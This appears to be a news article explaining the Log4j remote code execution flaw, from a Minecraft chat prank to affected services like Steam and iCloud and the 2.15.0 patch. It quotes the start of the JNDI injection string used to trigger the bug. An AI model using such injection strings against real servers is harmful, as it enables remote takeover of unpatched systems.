Serious Log4j Security Flaw Puts The Entire Internet At Risk, Even iCloud And Steam

hero hacker cybersecurity
You may have heard about a recent prank making the rounds in Minecraft. By sending a chat message starting with "${jndi:ldap://" users could make their friends' Minecraft client open a browser window and go to a specific website. So naturally, pranksters were sending their friends to all kinds of shocking and disgusting content, in what appeared to be some sort of specific Minecraft security flaw.

Unfortunately for everyone, it turns out that the prank was not actually exploiting a flaw in Minecraft, but in fact in the Apache Log4j library that Minecraft uses for logging. The problem is that Minecraft is just one of thousands upon thousands of web-based and other applications that use Log4j. When researching the root of this exploit, it's actually easier to talk about what is not affected, rather than what is.

Valve's massive Steam game distribution service and Apple's iCloud are just a couple of high-profile services that were affected by this exploit, along with nearly every webhost in the world. The flaw is actually an extremely common type of exploit in Java applications because of the way Java works. Essentially, Java is somewhat infamous for its tendency to intermingle code and data, and without careful accounting for this nature, bugs like this can easily occur.
Apache Log4j Logo
What's actually happening in this case is that the Log4j tool is turning strings meant for logging into executable code. If a server uses Log4j to parse any user-entered text anywhere, that text can be formatted to contain a command that is then executed on the remote machine, which in turn effectively can gain the user remote code execution on the host system with full system-level privileges. We probably don't need to explain why that's a huge problem, but just in case, it essentially gives any user full administrative control over every system running Log4j.

The bug is already patched in Log4j version 2.15.0, but the logging package is included in an incredible number of applications, even ones you wouldn't expect. The application doesn't have to be written in Java to use log4j. Third-party application developers may be slow to patch their software, and in some cases, may not even be aware that they are actually including log4j as a dependency. If you have a system that isn't or can't be patched, there are workarounds, which the Apache group details on the security vulnerabilities page here.